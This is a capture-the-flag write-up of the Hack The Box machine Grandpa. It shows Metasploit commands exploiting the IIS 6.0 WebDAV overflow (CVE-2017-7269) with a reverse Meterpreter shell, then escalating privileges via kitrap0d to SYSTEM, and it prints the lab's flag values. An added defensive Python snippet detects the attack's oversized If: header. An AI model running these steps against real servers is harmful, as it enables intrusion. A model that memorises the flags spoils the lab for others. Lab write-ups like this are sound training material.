About

Grandpa is one of the simpler machines on Hack The Box, but it covers the widely exploited CVE-2017-7269, a buffer overflow in the IIS 6.0 WebDAV service. The vulnerability is trivial to exploit and, when it became public knowledge, granted immediate access to thousands of IIS servers around the globe.

Enumeration

Running the script portscan.sh reveals a single attack vector, HTTP.

┌──(m0nk3y@kali)-[~/HTB/Grandpa]
└─$ sudo portscan.sh 10.129.95.233

┌──(m0nk3y@kali)-[~/HTB/Grandpa]
└─$ cat PortScan\(10.129.95.233\)

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-webdav-scan:
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Date: Sat, 09 Sep 2023 04:32:16 GMT
|   Server Type: Microsoft-IIS/6.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

HTTP

Since nmap identified the HTTP service as Microsoft IIS 6.0, I’ll check for known vulnerabilities with searchsploit-prettify.py. From the results, I’ll start by testing Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow, since it directly allows remote code execution.

┌──(m0nk3y@kali)-[~/HTB/Grandpa]
└─$ searchsploit-prettify.py 'Microsoft IIS 6.0'
 ---------------------------------------------------------------------------------------- ---------------------------------------------------------
| Exploit Title                                                                          | Path                                                    |
 ---------------------------------------------------------------------------------------- ---------------------------------------------------------
| Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure       | /usr/share/exploitdb/exploits/windows/remote/21057.txt  |
| Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow                | /usr/share/exploitdb/exploits/windows/remote/9541.pl    |
| Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service                  | /usr/share/exploitdb/exploits/windows/dos/9587.txt      |
| Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service                           | /usr/share/exploitdb/exploits/windows/dos/3965.pl       |
| Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | /usr/share/exploitdb/exploits/windows/dos/15167.txt     |
| Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow               | /usr/share/exploitdb/exploits/windows/remote/41738.py   |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                            | /usr/share/exploitdb/exploits/windows/remote/8704.txt   |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                            | /usr/share/exploitdb/exploits/windows/remote/8806.pl    |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                        | /usr/share/exploitdb/exploits/windows/remote/8754.patch |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass                                | /usr/share/exploitdb/exploits/windows/remote/8765.php   |
| Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                               | /usr/share/exploitdb/exploits/windows/remote/19033.txt  |
 ---------------------------------------------------------------------------------------- ---------------------------------------------------------

Using a Metasploit module for the same vulnerability, I’m able to gain a shell on the target. However, running getuid fails with an access-denied error. This can happen when the session is spawned inside a process whose token lacks the privileges Meterpreter needs for the call.

┌──(m0nk3y@kali)-[~/HTB/Grandpa]
└─$ msfconsole -q -x 'use exploit/windows/iis/iis_webdav_scstoragepathfromurl; set RHOSTS 10.129.95.233; set RPORT 80; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
RHOSTS => 10.129.95.233
RPORT => 80
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175686 bytes) to 10.129.95.233
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.95.233:1032) at 2023-09-09 00:37:40 -0400

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
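
From the defender's side, the request that triggers this bug is a WebDAV PROPFIND carrying an If: header far larger than any legitimate client sends, with non-ASCII bytes in it. The following is an added example (not part of the original writeup or of Metasploit) that runs a simple triage over captured raw HTTP requests; the two sample requests and the 512-byte threshold are constructed assumptions.

```python
import re

# Constructed sample captures (not real traffic). The second one has the
# shape of a CVE-2017-7269 attempt: PROPFIND with an oversized If: header.
BENIGN = (
    b"PROPFIND /docs/ HTTP/1.1\r\nHost: intranet\r\nDepth: 1\r\n"
    b"If: <http://intranet/docs/> (<opaquelocktoken:abc-123>)\r\n"
    b"Content-Length: 0\r\n\r\n"
)
SUSPECT = (
    b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
    b"If: <http://localhost/" + b"A" * 700 + "\u00e9".encode("utf-8") * 20 + b">\r\n\r\n"
)

WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
IF_HEADER_LIMIT = 512  # assumed threshold; real If: headers are a few hundred bytes at most

# RFC 4918 If header: one or more tagged lists "<ref> (list)+" or untagged lists "(list)+".
IF_GRAMMAR = re.compile(rb"\s*(?:(?:<[^<>]*>\s*(?:\([^()]*\)\s*)+)+|(?:\([^()]*\)\s*)+)")


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, target, {lowercase header: value})."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii")] = value.strip()
    return method.decode("ascii"), target.decode("ascii", "replace"), headers


def assess(raw: bytes) -> dict:
    """Flag WebDAV requests whose If: header is oversized, non-ASCII or malformed."""
    method, target, headers = parse_request(raw)
    if_hdr = headers.get("if", b"")
    findings = []
    if method in WEBDAV_METHODS and if_hdr:
        if len(if_hdr) > IF_HEADER_LIMIT:
            findings.append(f"oversized If header ({len(if_hdr)} bytes)")
        if any(b > 0x7F for b in if_hdr):
            findings.append("non-ASCII bytes in If header")
        if not IF_GRAMMAR.fullmatch(if_hdr):
            findings.append("If header does not match the RFC 4918 list grammar")
    return {"method": method, "target": target, "suspicious": bool(findings), "findings": findings}


if __name__ == "__main__":
    for sample in (BENIGN, SUSPECT):
        print(assess(sample))
```

In a production IDS the same three checks would sit on the WebDAV request path; IIS 6.0 itself does not log the If: header, so the capture has to come from a proxy or network sensor.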

By migrating to another process with higher privileges, I’m able to gain a shell as the user NT AUTHORITY\NETWORK SERVICE.

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 148   1084  cidaemon.exe
 216   1084  cidaemon.exe
 272   4     smss.exe
 320   272   csrss.exe
 344   272   winlogon.exe
 392   344   services.exe
 404   344   lsass.exe
 584   392   svchost.exe
 668   392   svchost.exe
 732   392   svchost.exe
 772   392   svchost.exe
 796   392   svchost.exe
 944   392   spoolsv.exe
 972   392   msdtc.exe
 1084  392   cisvc.exe
 1132  392   svchost.exe
 1188  392   inetinfo.exe
 1224  392   svchost.exe
 1324  392   VGAuthService.exe
 1408  392   vmtoolsd.exe
 1508  392   svchost.exe
 1624  392   svchost.exe
 1796  392   dllhost.exe
 1968  392   alg.exe
 1996  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2444  584   wmiprvse.exe
 2748  344   logon.scr
 3344  1508  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 3420  584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3748  3344  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 4056  1084  cidaemon.exe

meterpreter > migrate 1996
[*] Migrating from 3748 to 1996...
[*] Migration completed successfully.

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

Privilege Escalation

To look for local vulnerabilities, I’ll use the module post/multi/recon/local_exploit_suggester. The results list 7 potentially usable exploits.

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.129.95.233 - Collecting local exploits for x86/windows...
[*] 10.129.95.233 - 186 exploit checks are being tried...
[+] 10.129.95.233 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.95.233 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.95.233 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.129.95.233 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 9   exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 10  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 11  exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system
 12  exploit/windows/local/bits_ntlm_token_impersonation            No                       The check raised an exception.
 13  exploit/windows/local/bthpan                                   No                       The target is not exploitable.
 14  exploit/windows/local/bypassuac_eventvwr                       No                       The target is not exploitable.
 15  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 16  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.
 17  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 18  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   No                       The target is not exploitable. Target is not running a vulnerable version of Windows!
 19  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
 20  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
 21  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 22  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 23  exploit/windows/local/ipass_launch_app                         No                       The check raised an exception.
 24  exploit/windows/local/lenovo_systemupdate                      No                       The check raised an exception.
 25  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.
 26  exploit/windows/local/mqac_write                               No                       The target is not exploitable.
 27  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows .NET Server (5.2 Build 3790, Service Pack 2). is not vulnerable
 28  exploit/windows/local/ms13_053_schlamperei                     No                       The target is not exploitable.
 29  exploit/windows/local/ms13_081_track_popup_menu                No                       Cannot reliably check exploitability.
 30  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.
 31  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  No                       The check raised an exception.
 32  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 33  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.
 34  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.
 35  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.
 36  exploit/windows/local/ntusermndragover                         No                       The target is not exploitable.
 37  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 38  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 39  exploit/windows/local/tokenmagic                               No                       The target is not exploitable.
 40  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.
 41  exploit/windows/local/webexec                                  No                       The check raised an exception.

With a bit of trial and error among the suggested modules, I’m able to use exploit/windows/local/ms10_015_kitrap0d to gain a shell as the user NT AUTHORITY\SYSTEM.

meterpreter > run exploit/windows/local/ms10_015_kitrap0d LHOST=10.10.16.9 LPORT=4444

[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 3228 launched.
[*] Reflectively injecting the DLL into 3228...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.95.233
[*] Meterpreter session 2 opened (10.10.16.9:4444 -> 10.129.95.233:1034) at 2023-09-09 00:48:38 -0400
[*] Session 2 created in the background.

meterpreter > sessions 2
[*] Backgrounding session 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

meterpreter > cat 'C:\Documents and Settings\Harry\Desktop\user.txt'
bdff5ec67c3cff017f2bedc146a5d869

meterpreter > cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'
9359e905a2c35f861f6a57cecf28bb7b